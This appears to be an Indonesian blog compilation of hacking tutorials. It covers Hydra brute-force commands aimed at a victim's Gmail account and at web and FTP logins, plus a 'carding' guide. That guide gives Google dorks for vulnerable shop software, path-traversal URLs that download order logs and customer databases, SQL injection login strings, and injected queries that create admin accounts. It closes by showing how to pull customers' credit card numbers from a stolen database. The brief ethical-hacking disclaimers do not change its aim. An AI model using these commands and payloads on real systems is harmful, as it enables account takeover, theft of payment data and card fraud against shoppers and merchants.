HACK GMAIL MENGGUNAKAN HYDRA

CARA HACK AKUN GMAIL MENGGUNAKAN HYDRA

 
Yang perama siapkan wordlist
cari di gugel.com banyak kok klau perlu download yang versi indonesianya.
Kalian harus cari di mana lokasi tempat wordlist yang kalian download tadi.

Extract  wordlist rockyou.txt.gz called rockyou.txt and drag wordlist keluar di Kali desktop.

Buka Terminal

Sekarang ketik  hydra di terminal, jika kamu ingin melihat cara pengunaan hydra keti hydra -h

ini adalah tampilan hydra dan cara menggunakannya


 kemudian ketik seperti ini
hydra smtp.gmail.com smtp -l victim@gmail.com -P ‘/root/Desktop/rockyou.txt’ -s 465 -S -v -V
Kalian harus mengukuti cara pengunaan hydara seperti ;
informasi tentang email server, port number, and email account name:

hydra smtp.victimsemailserver.com smtp -l victimsaccountname -P ‘/root/Desktop/rockyou.txt’ -s portnumber -S -v -V

The SMTP server (For example, smtp.gmail.com if the victim is a Gmail user) is the victim’s email provider.
-l victim@gmail.com  Gmail login account informasi korban.
-P ‘root/Desktop/rockyou.txt’ lokasi penyimpanan wordlist yang tadi kalian drag ke destop Kali Linux
-s 465 (port 465 refers to SMTPS port) Port 465 stands for SMTPS which is SSL encryption that is started automatically.
For the demonstration, I’ve created a dummy Gmail account, and it was very easy to crack the password since I intentionally set the password to a single English word: princess. It took about 30 tries to crack the password.
Jeez, if life was that easy.
The more complex a password is, the more difficult it is to brute force it successfully.
The longer it takes, the more likely a false positive will be generated depending on who the email provider is.
Suck it up, princess!

sekian dlu guys ..
wasslam....

sumber : https://www.sunnyhoi.com/

Tutorial Hydra Part II ( Bruteforce Login Website ) 


Relate Search : Hydra, Cracking, Hacking, Bypass, Facebook, Twitter, Login, Website, Security, Terminal.
Bruteforce Login Website adalah suatu teknik dimana kita akan melakukan penetrasi dengan cara masuk ke dalam suatu website yang memiliki proteksi login, dengan cara ilegal yaitu melakukan penebakan user dan password secara masal. teknik bruteforce tidak hanya bisa di gunakan di website, tapi juga bisa di lakukan di lingkungan lain seperti login apps, login windows, login email dll.
pada tutorial kali ini saya akan melanjutkan sesi dari tutorial hydra. dan sekarang sudah mencapai part II, dengan judul " bruteforcing login website" , pada tutorial hydra part I saya menggunakan mode GUI untuk melakukan cracking, tapi untuk sekarang saya akan menggunakan versi Consolenya. teknik ini memanfaatkan Bug method GET yang di miliki website, pada praktiknya nanti saya akan menggunakan website yang saya buat sendiri, jadi dan menggunakan localhost sebagai servernya. tutorial ini bisa di terapkan dan di kembangkan untuk website-website yang lebih terkenal seperti facebook, twitter, pinterest dll. tapi  harus tetap menggunakan Etical hacking. dan jangan sampai merugikan orang lain atas nafsu hacking anda.
oke, tanpa basa basi lagi, langsung saja ke tutorialnya :
Hal-hal yang di butuhkan : 
- Terminal (Console Linux)
- Hydra
- Website Target ( Localhost )
1. buka terminal tekan alt+ctrl+t , atau dari menu linux , pilih terminal.
masuk ke akses root , ketik : sudo su, apabila anda menggunakan kali linux atau os penetrasi lainnya, bisa skip langkah ini.


2. check website yang akan menjadi tempat testing . saya menggunakan localhost yang memiliki login website yang saya buat sendiri.

 3. langkah selanjutnya adalah mencoba dan melihat hasil apabila login yang di lakukan salah.
























ingat baik-baik hasil login apabila ada kesalahan dalam username dan password.
pada contoh kali ini, hasil yang muncul adalah "Login gagal"  seperti pada gambar di bawah ini.


4. siapkan wordlist yang berisi email dan password. akan lebih memudahkan apabila anda sudah mengatahui email target, jadi anda tinggal menyertakan wordlist password dari akun target. berikut saya menggunakan wordlist yang berisi email saya sendiri, saya simpan dengan nama user.txt.



berikut  wordlist password yang berisi kata random, yang saya simpan dengan nama pass.txt :



5. setelah perlengkapan siap semua, sekarang waktunya melakukan eksekusi, ketikkan perintah :

hydra -L user.txt -P pass.txt 127.0.0.1 http-get-form "/login.php:username=^USER^&password=^PASS^&login=login:gagal"

 keterangan :

- biru : nama file worlist user dan pass yang udah di buat atau di download.
- merah : domain website atau ip website.
- hijau : nama metode yang di gunakan oleh website untuk proses login. untuk mengetahui metode ini bisa di lakukan inspect element pada form login website, seperti pada gambar di bawah ini.



pada gambar di atas bisa kita lihat 2 baris di bawah garis biru terdapat kata "method='GET'" yang menyebutkan bahwa form login ini menggunakan methode GET.

- orange : sub url yang ada pada waktu kesalahan login , yang di ubah sedikit. 

sub url yang awalnya : /login.php?username=bill&password=testing&login=login
- tanda tanya di ganti dengan titik dua
- username yang di inputkan sebelumnya di ganti dengan ^USER^
- password yang di inputkan sebelumnya di ganti dengan ^PASS^
- pada akhir sub url di tambah dengan "titik dua" di tambah kata yang ada pada kesalah login yaitu "gagal", hasilnya ":gagal"
hasil dari beberapa penggantian di atas adalah :
 "/login.php:username=^USER^&password=^PASS^&login=login:gagal"

jangan lupa di beri tanda kutip untuk sub urlnya



 6. setelah selesai di ketikkan di atas, maka lanjutkan dengan menekan ENTER.
tunggu prosesnya hingga selesai, lama tidak nya proses bruteforcing tergantung dari kerumitan user dan password target.

dapat di lihat di atas, bahwa proses bruteforcing telah selesai, dan mendapatkan hasil yaitu :

host: 127.0.0.1    login: bill@3xpl01t.com   password: testing

7. selanjutnya balik ke halaman login website, lalu ketikkan user dan password yang sudah di peroleh tadi.



VOILAAAA... login sukses.


teknik ini benar-benar powerfull, walaupun begitu tetep ada kelemahannya. bayangkan apabila teknik di atas di lakukan ke pada login website yang sebenarnya. selamat bereksperimen.

Tutorial Hydra Part I ( Cracking FTP Account Using GUI Mode )

 
Tutorial ini tentang cracking ftp password dengan Hydra.
Relate search :  hacking, cracking, backtrack, hydra, hydra -G, kali, linux, password, username, email, server, website, terminal.
Hydra adalah suatu tools yang di gunakan untuk melakukan bruteforcing kepada akun tertentu di suatu jaringan atau server, contohnya FTP dan SSH. hydra adalah tools opensource, dan sudah bisa di install di segala platform termasuk windows, linux dan mac. tools ini memiliki dua versi yaitu, versi GUI dan versi CLI, pada kali ini saya akan memberikan contoh menggunakan GUI Mode. untuk lebih jelasnya tetang keterangan dari Hydra , bisa lihat di website aslinya di sini https://www.thc.org/thc-hydra/
tutorial kali ini saya akan memberikan langkah-langkah untuk melakukan bruteforcing kepada akun FTP .
WARNING : Tutorial ini bermaksud untuk memberikan pengetahuan bagi para pemilik akun ftp agar tau dan bisa memproteksi akun miliknya agar tidak bisa di crack atau di retas. diharapkan bagi pembaca yang belum mengenal etical hacking, untuk mempelajari etical hacking terlebih dahulu.

berikut langkah-langkahnya :
1. Buka terminal , tekan ctrl+alt+T atau klik shortcut yang ada pada distro milik anda. sebelum melakukan cracking terhadap target, kita harus mengetahui apakah service FTP dan port target sedang aktif atau tidak. hal ini juga menjadi salah satu cara untuk para pemilik server , untuk tidak selalu mengaktifkan service FTP nya apabila tidak di butuhkan.
2. Ketik "nmap <host target atau ip server target>" seperti target berikut , saya menggunakan localhost sebagai target kali ini. maka saya ketik "nmap 127.0.0.1" seperti gambar di bawah ini.

3. dapat di lihat di atas, bahwa ternyata service ftp sedang berjalan di host 127.0.0.1 dengan port 21 (port default dari FTP).



4. selanjutnya ketik "xhydra" untuk membuka hydra versi GUI, maka hasilnya akan keluar Hydra seperti berikut :



5. pada tab target silahkan masukkan target pada textbox singgle target (apabila target cuma satu) pada target list masukkan file text berisi host target (apabila target lebih dari satu). pada contoh kali ini saya hanya memiliki 1 target yaitu localhost.
- masukkan nomer port yang aktif tadi, yaitu : 21
- pilih protocol yang menjadi target :  FTP
- centang "Be Verbose" agar, aksi yang di lakukan nanti akan memiliki history dan di tampilkan di layar.


6. pada tab PASSWORDS Masukkan username dan password di textbox username dan password ( apabila hanya mempunyai satu username dan password ), masukkan di texbox username list dan password list ( apabila mempunyai lebih dari satu username dan password ) , pada textbox ini kita masukkan wordlist kita yang sudah kita punya.
pada contoh kali ini, saya memasukkan wordlist bernama rockbrute.txt . seperti pada gambar berikut :


Maka hasilnya akan seperti berikut :
- centang " try login as password " dan " try empty login ".


7. setelah semua di lakukan, waktunya kita jalankan aksinya. klik tab start, lalu tekan tombol start untuk memulai. tunggu sampai  aksi selesai. lama aksi ini tergantung dengan kerumitan user dan password yang di punya oleh pemilik akun ftp. hal ini dapat di manfaatkan oleh para pengguna FTP agar mengenkripsi user dan password miliknya agar tidak mudah di retas .


8. apablia berhasil, maka hasilnya akan seperti ini :

Login dengan username :  nobody
password : lampp



9.  untuk memeriksa apakah user dan password nya benar, selanjutnya kita akan mencoba login ke akun ftpnya menggunakan filezilla. 

masukkan host : 127.0.0.1 
username : nobody 
password : lampp
port : 21

NB : semua yang di isikan , tergantung pada hasil dan target yang anda punya.

bisa di lihat di atas , bahwa koneksi ke ftp berhasil. dan saya dapat mengakses semua file yang ada di dalam server target.

NB : sebelah kiri adalah direktori local , sebelah kanan adalah direktori server.
 
sekian dlu guys :v
Wassalam....
 
 Sumber : http://www.bill.web.id/

TUTORIAL CARDING

 FULL TUTORIAL CARDING
 
 
Assalamualaikum guys :v
 Bertemu Lagi dengan saya...
Apa kabar guys (alhamdulillah baik)


Kali ini saya akan menjelaskan bagaimana cara carding cuk :v

Simak yang bener gan .

Carding merupakan salah satu kejahatan di internet yang berupa penipuan dalam proses perbelanjaan, yaitu dengan berbelanja mengguakan nomor dan identitas kartu kredit orang lain yang diperoleh secara illegal dan biasanya dengan mencuri data di internet. Sasaran yang dituju oleh carder (sebutan bagi para penipu di internet) adalah website berbasis E-commerce yang memungkinkan data basenya menyimpan puluhan bahkan ratusan kartu kredit, paypal atau data nasabah bank. Terdapat banyak karakteristik kejahatan carding yang terjadi, di antaranya adalah :

    Minimized Physical Contact (tidak adanya kontak secara fisik)
    System modus ini adalah carder  tidak perlu mencuri kartu kredit secara fisik, tapi cukup  dengan mengetahui nomornya, pelaku sudah bisa melakukan aksinya.
    Non violance (tanpa kekerasan)
    Pelaku tidak melakukan kekerasan secara fisik seperti  ancaman yang menimbulkan ketakutan sehinga korban memberikan harta bendanya.
    Global karena kejahatan ini terjadi lintas negara yang mengabaikan batas-batas geografis dan waktu.
    High Technology
    Sarana yang digunakan dalam kejahatan tersebut menggunakan peralatan berteknologi yang berupa jaringan internet.

Proses pertama yang dilakukan seorang carder adalah dengan Mendapatkan nomor kartu kredit yang bisa dilakukan dengan berbagai cara antara lain: phising (membuat situs palsu seperti dalam kasus situs klik.bca), hacking, sniffing, keylogging, worm, chatting dengan merayu dan tanpa sadar memberikan nomor kartu kredit secara sukarela, berbagi informasi antara carder, mengunjungi situs yang memang spesial menyediakan nomor-nomor kartu kredit buat carding dan lain-lain. Setelah itu Mengunjungi situs-situs online yang banyak tersedia di internet seperti Ebay, Amazonuntuk kemudian carder mencoba-coba nomor yang dimilikinya untuk mengetahui apakah kartu tersebut masih valid atau limitnya mencukupi. Lalu melakukan transaksi secara online untuk membeli barang seolah-olah carder adalah pemilik asli dari kartu tersebut dan Menentukan alamat tujuan atau pengiriman, s
ebagaimana kita ketahui bahwa Indonesia dengan tingkat penetrasi pengguna internet di bawah 10 %, namun menurut survei AC Nielsen tahun 2001 menduduki peringkat keenam dunia dan keempat di Asia untuk sumber para pelaku kejahatan carding. Hingga akhirnya Indonesia di-blacklist oleh banyak situs-situs online sebagai negara tujuan pengiriman. Oleh karena itu, para carder asal Indonesia yang banyak tersebar di Jogja, Bali, Bandung dan Jakarta umumnya menggunakan alamat di Singapura atau Malaysia sebagai alamat antara dimana di negara tersebut mereka sudah mempunyai rekanan, maka carder langsung dapat mengambil barang tersebut.

Dan untuk menangani hal-hal tersebut  polri telah menyikapinya dengan membentuk suatu satuan khusus di tingkat Mabes Polri yang dinamakan Direktorat Cyber Crime. Di awali oleh personil terlatih untuk menangani kasus-kasus semacam ini, tidak hanya dalam teknik penyelidikan dan penyidikan, tapi juga mereka menguasai teknik khusus untuk pengamanan dan penyitaan bukti-bukti secara elektronik. Mengingat dana yang terbatas karena mahalnya peralatan dan biaya pelatihan personil, maka apabila terjadi kejahatan di daerah, maka Mabes Polri akan menurunkan tim ke daerah untuk memberikan asistensi. Dan secara detil dapat saya kutip isi pasal tersebut yang menerangkan tentang perbuatan yang dianggap melawan hukum menurut UU ITE berupa illegal access:
Pasal 31 ayat 1: “Setiap orang dengan sengaja dan tanpa hak atau melawan hukum melakukan intersepsi atau penyadapan atas informasi elektronika dan atau dokumen elektronik dalam suatu komputer dan atau sistem elektronik secara tertentu milik orang lain.”
Pasal 31 ayat 2: “Setiap orang dengan sengaja atau tanpa hak atau melawan hukum melakukan intersepsi atau transmisi elktronik dan atau dokumen elektronik yang tidak bersidat publik dari, ke dan di dalam suatu komputer dan atau sistem elektronik tertentu milik orang lain, baik yang tidak menyebabkan perubahan, penghilangan dan atau penghentian informasi elektronik dan atau dokumen elektronik yang ditransmisikan.” . semoga langkah awal dari pengamanan ini mampu mencegah kejahatan-kejahatan yang terus meningkat. Amienn ………!



Carding Bagian 1

ini adalah tutor lama, tapi mungkin saja
masih bisa membantu temen² seperti saia
yang baru belajar.....
Contoh bugs pada bentuk toko system :
shopadmin

Ketik keyword google :
allinurl:/shopadmin.asp
Contoh target : http://www.Target.com/shopadmin.asp
user : 'or'1
pass : 'or'1

Contoh bugs pada bentuk toko sistem :
Index CGI
Ketik keyword google :
allinurl:/store/index.cgi/page=
Contoh target:
http://www.Target.com/cgi-bin/store/inde...e=short_bl ue.htm
Hapus short_blue.htm dan gantidengan
:./admin/files/order.log
Hasilnya:www.Target.c om/cgi-bin/store/index.cgi?page=../admin/files/order... log

Contoh bugs pada bentuk toko sistem :
metacart
Ketik keyword google.com :
allinurl:/metacart/

Contoh target :
http://www.Target.com/metacart/about.asp
Hapus moreinfo.asp dan ganti dengan :
--> /database/metacart.mdb
Hasilnya:
/www.Target.com/metacart/database/metacart.mdb

Contoh bugs pada bentuk toko sistem :DCShop
Ketik keyword google.com : allinurl:/DCShop/
Contoh : http://www.Target.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan
/DCShop/orders/orders.txt atau
/DCShop/Orders/orders.txt
Hasilnya:
http://www.Target.com/xxxx/DCShop/orders/orders.txt
Contoh bugs pada bentuk toko sistem : EShop
Ketik keyword google.com : allinurl:/eshop/
Contoh : http://www.Target.com/xxxxx/eshop
Hapus /eshop dan ganti dengan :
/cg-bin/eshop/database/order.mdb

Hasilnya:
http://www.Target.com/.../cg-bin/eshop/d.../order.mdb
Download file *.mdb nya dan Buka file
tsb pakai Microsoft Acces

Carding Bagian 2

masih lanjutan tutor yang sebelumnya.
tetep tutor lama. maklum aja saia kan
newbie..jadi adanya tutor lama.
tapi dengan segala keterbatasan saia,
itu tidak membuat saia berdiam diri dan
tidak berbagi. ya kan??...walaupun
sedikit yang penting berbagi
Contoh bugs pada bentuk toko sistem :
PDshopro
Ketik keyword google.com :
allinurl:/shop/category.asp/catid=
Contoh :
http://www.Target.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxxx
dang ganti dengan : /admin/dbsetup.asp
Hasilnya : http://www.Target.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati
file databasenya dgn nama
sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan
merubah url nya menjadi
http://www.Target.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces
Contoh bugs pada bentuk toko sistem :
commerceSQL
Ketik keyword google.com :
allinurl:/commercesql/
Contoh : http://www.Target.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti
dengan: cgi-bin/commercesql/index.cgi?page=
Hasilnya:
http://www.Target.com/cgi-bin/commercesq....cgi?page=
Untuk melihat adminconfig
http://www.Target.com/cgi-bin/commercesql/index.cgi?pa ge=../admin/admin_conf.pl
Untuk melihat adminmanager
http://www.Target.com/cgi-bin/commercesql/index.cgi?p age=../admin/manager.cgi
Untuk melihat filelog/CCnya
http://www.Target.com/cgi-bin/commercesql/index.cgi ?page=../admin/files/order.log
Contoh bugs pada bentuk toko sistem :
Cart32 v3.5a
Ketik keyword google.com :
allinurl:/cart32.exe/
Contoh:
http://www.Target.net/wrburns_s/cgi-bin/...e/NoItemFo und
Ganti NoItemFound dengan : error
Bila kita mendapati page error dg
keterangan instalasi dibawahnya,
berarti kita sukses!
Sekarang, kita menuju pada keterangan di
bawahnya, geser halaman
kebawah, dan cari bagian Page Setup and
Directory Kalau dibagian
tersebut terdapat list file dgn format
/akhiran.c32 berarti di site tsb.
terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau
semuanya ke notepad atau
program text editor lainnya.
Ganti string url tsb. menjadi seperti
ini :http://www.
Target.net/wrburns_s/cgi-bin/cart32/
Nah. ., paste satu per satu, file .c32 ke
akhir url yg sudah
dimodifikasi tadi, denganformat
http://www.Target.com/cart32/
Contoh
http://w ww.Target.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c 32
Contoh bugs pada bentuk toko sistem :
VP-ASP Shopping Cart 5.0
Ketik keyword google.com :
allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string
berikut di akhir bagian
shopdisplayproducts.asp
Contoh:
http://Target.com/vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto,fldpassword%20from%2 0tbluser%20where%20fldusername='admin'%20and%20fldpassw ord%20like%20'a%25'--

Gantilah nilai dari string url terakhir dg:
: %20'a%25'--
: %20'b%25'--
: %20'c%25'--
Kalau berhasil, kita akan mendapatkan
informasi username dan password admin
Untuk login admin ke
http://Target.com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya

Contoh bugs pada bentuk toko sistem :
VP-ASP Shopping Cart 5.0
Ketik keyword google.com : Ketik -->
allinurl:/vpasp/shopsearch.asp
Buka url target dan utk membuat admin
baru, postingkan data berikut
satu per satu pada bagian search engine :
Keyword=&category=5); insert into
tbluser (fldusername)values
('')--&SubCategory=&hide=&action.x=46&action.y= 6
Keyword=&category=5); update tbluser set
fldpassword=''where
fldusername=''--&SubCategory=All&action.x=33&act ion.y=6
Keyword=&category=3); update tbluser set
fldaccess='1'where
fldusername=''--&SubCategory=All&action.x=33&act ion.y=6
Jangan lupa untuk mengganti dan nya
terserah kamu.
Untuk mengganti password admin, masukkan
keyword berikut :
Keyword=&category=5); update tbluser set
fldpassword=''where
fldusername='admin'--&SubCategory=All&action.x=3 3&action.y=6
Untuk login admin, ada di
http://Target/vpasp/shopadmin.asp

Carding Bagian 3



tetep tutor lama dari seorang
pemula..huekekekekeke. maaf yak kalo ada
yang salah. mohon dikoreksi kembali


Contoh bugs pada bentuk toko sistem :
Lobby.asp
Ketik keyword google.com : allinurl:
Lobby.asp
Contoh : http://www.Target.com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti
dengan : fpdb/shop.mdb
Hasilnya : http://www.Target.com/fpdb/shop.mdb


Contoh bugs pada bentuk toko sistem :
Shopper.cgi
Ketik keyword google.com : allinurl:
/cgi-local/shopper.cgi
Contoh:
http://www.Target.com/cgi-local/shopper....dd=action& key=
Tambah dengan :...&template=order.log
Hasilnya:
http://www.xxxxxxxx.com/cgi-local/shoppe...add=action &key=...&template=order.log


Contoh bugs pada bentuk toko sistem
:Proddetail.asp
Ketik keyword google.com :
allinurl:proddetail.asp?prod=
Contoh:
http://www.Target.org/proddetail.asp?pro...SledRaffle
H apus tulisan proddtail.asp?prod=SG369
dan ganti dengan --> fpdb/vsproducts.mdb
Hasilnya :
http://www.Target.org/fpdb/vsproducts.mdb

Contoh bugs pada bentuk toko sistem
:Digishop
Ketik keyword google.com :
inurl:"/cart.php?m="
Contoh :
http://Target.com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view
dan ganti dengan -->admin
Hasilnya http://Target.com/store/admin
Trus masukin username sama pass nya pake
statment SQL injection
Usename : 'or"="
Password : 'or"="
setelah bisa login, cari data yang
diperlukan .

Contoh bugs pada bentuk toko sistem :
Index CGI
Ketik keyword google.com :
allinurl:store/index.cgi/page=
Bugs : ../admin/files/order.log
Example:
http://www.target.com/cgi-bin/store/...ir_Manuals.ht m
masukin bugsnya:
http://www.target.com/cgi-bin/store/...iles/order.lo g
trus copy-paste tuch log'nya di notepad
biar gampang di baca


Contoh bugs pada bentuk toko sistem :
Index Cart
Ketik keyword google.com :
inurl:"/cart.php?m="
Bugs : Admin
ganti tulisn cart.php?m=view dengan admin
login pake SQl Injection :
username :'or"="
Passwordnya :'or"="

contoh target buat kalian :
LIVE TARGET EDITED
Contoh bugs pada bentuk toko sistem :
Index cart
Ketik keyword google.com : /ashopKart20/"
bugs : ganti tulisan yang ada didepannya
ama admin/scart.mdb


example LIVE TARGET EDITED
Injection : selanjutnya masukin bugs di
atas jadi : LIVE TARGET EDITED
kalo berhasil loe dapet file
beresktension .mdb nach file itu
tmn2 open with MS-Acces
Contoh bugs pada bentuk toko sistem : Catid
Ketik keyword google.com :
/shop/category.asp/catid=
Bugs : hapus tulisan
/shop/category.asp?catid=2 ganti dengan
/admin/dbsetup.asp


example : LIVE TARGET EDITED
masukin bugs menjadi : LIVE TARGET EDITED
kalo berhasil dapet file.mdb trus buka
pake MS - Access


ontoh bugs pada bentuk toko sistem : Store
Ketik keyword google.com :
inurl:"/store/proddetail.asp?prod="
bugs : ganti tulisan
proddetail.asp?prod= dengan
fpdb/vsproducts.mdb
Example : LIVE TARGET EDITED
masukin bugsnya LIVE TARGET EDITED
download file .mdbnya trus buka pake MS-
ACCESS..
Contoh bugs pada bentuk toko sistem :
Sunshop
Ketik keyword google.com : "Powered by
SunShop 3.2"
Atau google dork :
inurl:"/sunshop/index.php?action="
Bugs : ganti kata index.php dgn admin
kl ada peringatan java script error klik
"OK" aja
Contoh buat kalian : LIVE TARGET EDITED
ganti dengan admin http LIVE TARGET EDITED
Login pake SQL Injection :
Username : admin
Password :'or''='


Contoh bugs pada bentuk toko sistem :
digishop
Ketik keyword google.com
Ketik keyword google.com : "Powered by
Digishop 3.2"
Bugs : hapus tulisan cart.php?m= dengan
admin
Login pake SQL Injection :
Username : 'or"="
Password : 'or"="


Contoh target :
LIVE TARGET EDITED
Contoh bugs pada bentuk toko sistem :Lobby
Ketik keyword google.com :
inurl:"mall/lobby.asp"
bugs : ganti tulisan /mall/lobby.asp
dengan fpdb/shop.mdb
example : Gem Depot Lobby Page - Search
our Inventory


jadi LIVE TARGET EDITED
dapat dech .mdb ===> trus klik open
database JANGAN klik "convert
databese" ===> klk view orders ====>
trus cari orang yg pernah
belanja contoh pada customer no 36 trus
dimana no CCnya badKiddes....
sabar bro... masih di table customer no
36 then klikpayment



Mungkin sekian yang bisa saya sampaikan gan
Wassalam....
Semoga berjumpa lagi :*


Sumber : http://ghostsecret-team.blogspot.com/